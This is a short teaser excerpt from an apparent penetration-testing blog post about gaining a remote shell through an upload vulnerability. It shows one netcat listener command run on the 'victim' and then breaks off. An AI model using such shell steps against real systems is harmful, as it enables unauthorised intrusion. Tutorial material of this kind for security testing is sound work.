Getting a Remote Shell Let’s assume you’ve found some sort of access to your target, ideally an upload vulnerability that will let you get some shellcode onto the target. Netcat You could just start a Netcat listener on the victim, if Netcat is available: nc -lvnp 1234 … and start a shell on the attack …
Continue reading “[ Pen Testing ] :: Step by Step: Uploading Shellcode and Upgrading the Shell”